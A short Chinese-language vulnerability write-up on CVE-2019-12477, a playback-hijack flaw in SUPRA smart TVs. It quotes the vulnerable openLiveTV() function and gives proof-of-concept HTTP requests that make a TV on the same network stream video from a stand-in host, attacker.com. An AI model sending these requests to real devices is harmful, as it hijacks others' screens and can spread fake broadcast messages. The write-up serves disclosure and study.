[TOC]

SUPRA智能云播放劫持

描述：SUPRA智能云电视存在播放可劫持漏洞（CVE-2019-12477），与SUPRA电视处于同一无线网络环境中的攻击者，可向电视设备伪造播放请求，插播任意视频内容或虚假广播消息。

Dhiraj Mishra发现的漏洞问题在于电视流媒体获取功能 ‘openLiveURL()’，SUPRA电视用它来获取流媒体的播放内容,该功能缺乏必要的认证授权和会话管理措施，攻击者可以通过向一个静态的URL发送构造请求来触发漏洞，绕过授权验证，向播放机制中注入远程视频流文件，播放任意视频内容。

漏洞详情
漏洞接口位于 /remote/media_control?action=setUri&uri=URI服务端，存在漏洞的功能函数为openLiveTV(url)，以下为openLiveTV(url)函数源码片段：

function openLiveTV(url)  {  
    $.get("/remote/media_control", {
        m_action:'setUri',
        m_uri:url,m_type:'video/*'
        },  function (data, textStatus){
        if("success"==textStatus){   
             alert(textStatus);   
             }else   {    
            alert(textStatus);   }  
            });  
        }

向电视设备插入任意视频播放的构造请求POC：

GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 
HTTP/1.1Host: 192.168.1.155
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

直接用以下方式向处于同一无线网络环境中的SUPRA智能电视发起请求，也能实现插播效果POC：

http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

备注：

• https://www.inputzero.io/2019/06/hacking-smart-tv.html